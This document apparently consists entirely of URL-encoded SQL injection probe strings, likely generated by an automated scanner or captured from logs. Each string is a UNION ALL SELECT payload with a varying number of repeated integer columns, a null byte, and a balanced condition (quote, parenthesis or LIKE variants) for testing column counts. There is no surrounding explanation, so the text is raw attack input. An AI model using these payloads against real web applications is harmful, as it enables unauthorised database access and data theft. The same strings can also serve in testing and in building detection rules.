-3427%29%29%29%20UNION%20ALL%20SELECT%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%2C%204320%00%20AND%20%28%28%288865%3D8865 -9033%29%29%29%20UNION%20ALL%20SELECT%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%2C%203594%00%20AND%20%28%28%289339%3D9339 -8305%29%29%29%20UNION%20ALL%20SELECT%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%00%20AND%20%28%28%283432%3D3432 -3158%20UNION%20ALL%20SELECT%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%00 -5427%20UNION%20ALL%20SELECT%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%00 -3613%20UNION%20ALL%20SELECT%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%2C%206030%00 -2304%20UNION%20ALL%20SELECT%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%2C%203845%00 -5622%20UNION%20ALL%20SELECT%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%2C%206998%00 -2136%20UNION%20ALL%20SELECT%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%2C%201871%00 -2572%20UNION%20ALL%20SELECT%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%2C%209962%00 -3297%20UNION%20ALL%20SELECT%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%2C%205450%00 -7875%20UNION%20ALL%20SELECT%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%2C%208734%00 -8801%20UNION%20ALL%20SELECT%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%2C%202413%00 -7992%27%29%20UNION%20ALL%20SELECT%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%2C%208754%00%20AND%20%28%27jPrP%27%3D%27jPrP -2413%27%29%20UNION%20ALL%20SELECT%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%2C%209598%00%20AND%20%28%27RJqQ%27%3D%27RJqQ -9241%27%29%20UNION%20ALL%20SELECT%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%2C%201935%00%20AND%20%28%27KBHy%27%3D%27KBHy -1042%27%29%20UNION%20ALL%20SELECT%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%00%20AND%20%28%27TsVi%27%3D%27TsVi -1361%27%29%20UNION%20ALL%20SELECT%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%2C%201702%00%20AND%20%28%27cHuc%27%3D%27cHuc -8552%27%29%20UNION%20ALL%20SELECT%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%2C%208984%00%20AND%20%28%27roSO%27%3D%27roSO -9836%27%29%20UNION%20ALL%20SELECT%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%00%20AND%20%28%27evyN%27%3D%27evyN -6352%27%29%20UNION%20ALL%20SELECT%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%2C%206937%00%20AND%20%28%27uHZK%27%3D%27uHZK -5035%27%29%20UNION%20ALL%20SELECT%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%2C%205990%00%20AND%20%28%27ZCzr%27%3D%27ZCzr -1331%27%29%20UNION%20ALL%20SELECT%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%2C%209214%00%20AND%20%28%27alRC%27%3D%27alRC -2811%27%29%29%20UNION%20ALL%20SELECT%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%00%20AND%20%28%28%27peam%27%3D%27peam -7488%27%29%29%20UNION%20ALL%20SELECT%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%00%20AND%20%28%28%27PQOM%27%3D%27PQOM -4000%27%29%29%20UNION%20ALL%20SELECT%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%00%20AND%20%28%28%27bbdT%27%3D%27bbdT -6526%27%29%29%20UNION%20ALL%20SELECT%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%2C%207196%00%20AND%20%28%28%27cSLq%27%3D%27cSLq -1151%27%29%29%20UNION%20ALL%20SELECT%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%2C%201984%00%20AND%20%28%28%27twzL%27%3D%27twzL -7888%27%29%29%20UNION%20ALL%20SELECT%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%2C%203890%00%20AND%20%28%28%27Dknr%27%3D%27Dknr -5048%27%29%29%20UNION%20ALL%20SELECT%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%2C%206265%00%20AND%20%28%28%27vzFS%27%3D%27vzFS -3148%27%29%29%20UNION%20ALL%20SELECT%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%2C%209688%00%20AND%20%28%28%27otym%27%3D%27otym -9503%27%29%29%20UNION%20ALL%20SELECT%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%2C%205860%00%20AND%20%28%28%27WeJT%27%3D%27WeJT -4726%27%29%29%20UNION%20ALL%20SELECT%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%2C%209188%00%20AND%20%28%28%27luUW%27%3D%27luUW -5670%27%29%29%29%20UNION%20ALL%20SELECT%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%2C%208787%00%20AND%20%28%28%28%27FYXH%27%3D%27FYXH -8642%27%29%29%29%20UNION%20ALL%20SELECT%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%2C%209888%00%20AND%20%28%28%28%27YKCW%27%3D%27YKCW -8476%27%29%29%29%20UNION%20ALL%20SELECT%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%2C%202773%00%20AND%20%28%28%28%27pRar%27%3D%27pRar -8301%27%29%29%29%20UNION%20ALL%20SELECT%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%2C%204997%00%20AND%20%28%28%28%27JcTu%27%3D%27JcTu -9533%27%29%29%29%20UNION%20ALL%20SELECT%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%2C%202142%00%20AND%20%28%28%28%27cQGY%27%3D%27cQGY -1175%27%29%29%29%20UNION%20ALL%20SELECT%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%00%20AND%20%28%28%28%27xAWE%27%3D%27xAWE -2571%27%29%29%29%20UNION%20ALL%20SELECT%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%2C%209932%00%20AND%20%28%28%28%27LMvx%27%3D%27LMvx -3246%27%29%29%29%20UNION%20ALL%20SELECT%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%2C%206952%00%20AND%20%28%28%28%27CRnJ%27%3D%27CRnJ -6105%27%29%29%29%20UNION%20ALL%20SELECT%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%00%20AND%20%28%28%28%27ynpZ%27%3D%27ynpZ -7251%27%29%29%29%20UNION%20ALL%20SELECT%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%2C%204054%00%20AND%20%28%28%28%27uprc%27%3D%27uprc -5165%27%20UNION%20ALL%20SELECT%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%2C%209951%00%20AND%20%27anuA%27%3D%27anuA -1621%27%20UNION%20ALL%20SELECT%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%2C%207193%00%20AND%20%27SvdY%27%3D%27SvdY -7357%27%20UNION%20ALL%20SELECT%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%2C%206549%00%20AND%20%27hDUD%27%3D%27hDUD -3251%27%20UNION%20ALL%20SELECT%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%2C%205660%00%20AND%20%27lbkn%27%3D%27lbkn -2245%27%20UNION%20ALL%20SELECT%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%2C%202629%00%20AND%20%27IWZr%27%3D%27IWZr -7678%27%20UNION%20ALL%20SELECT%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%2C%207213%00%20AND%20%27hTeS%27%3D%27hTeS -6286%27%20UNION%20ALL%20SELECT%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%00%20AND%20%27qXOS%27%3D%27qXOS -5911%27%20UNION%20ALL%20SELECT%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%2C%204772%00%20AND%20%27zkqm%27%3D%27zkqm -8505%27%20UNION%20ALL%20SELECT%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%2C%203846%00%20AND%20%27bTAl%27%3D%27bTAl -5998%27%20UNION%20ALL%20SELECT%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%2C%204825%00%20AND%20%27ntqt%27%3D%27ntqt -9926%27%29%20UNION%20ALL%20SELECT%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%2C%204501%00%20AND%20%28%27QABA%27%20LIKE%20%27QABA -7762%27%29%20UNION%20ALL%20SELECT%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%2C%201327%00%20AND%20%28%27gxSc%27%20LIKE%20%27gxSc -9625%27%29%20UNION%20ALL%20SELECT%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%2C%205326%00%20AND%20%28%27AYsd%27%20LIKE%20%27AYsd -2278%27%29%20UNION%20ALL%20SELECT%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%2C%201934%00%20AND%20%28%27qNZw%27%20LIKE%20%27qNZw -6136%27%29%20UNION%20ALL%20SELECT%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%2C%208776%00%20AND%20%28%27ivuk%27%20LIKE%20%27ivuk 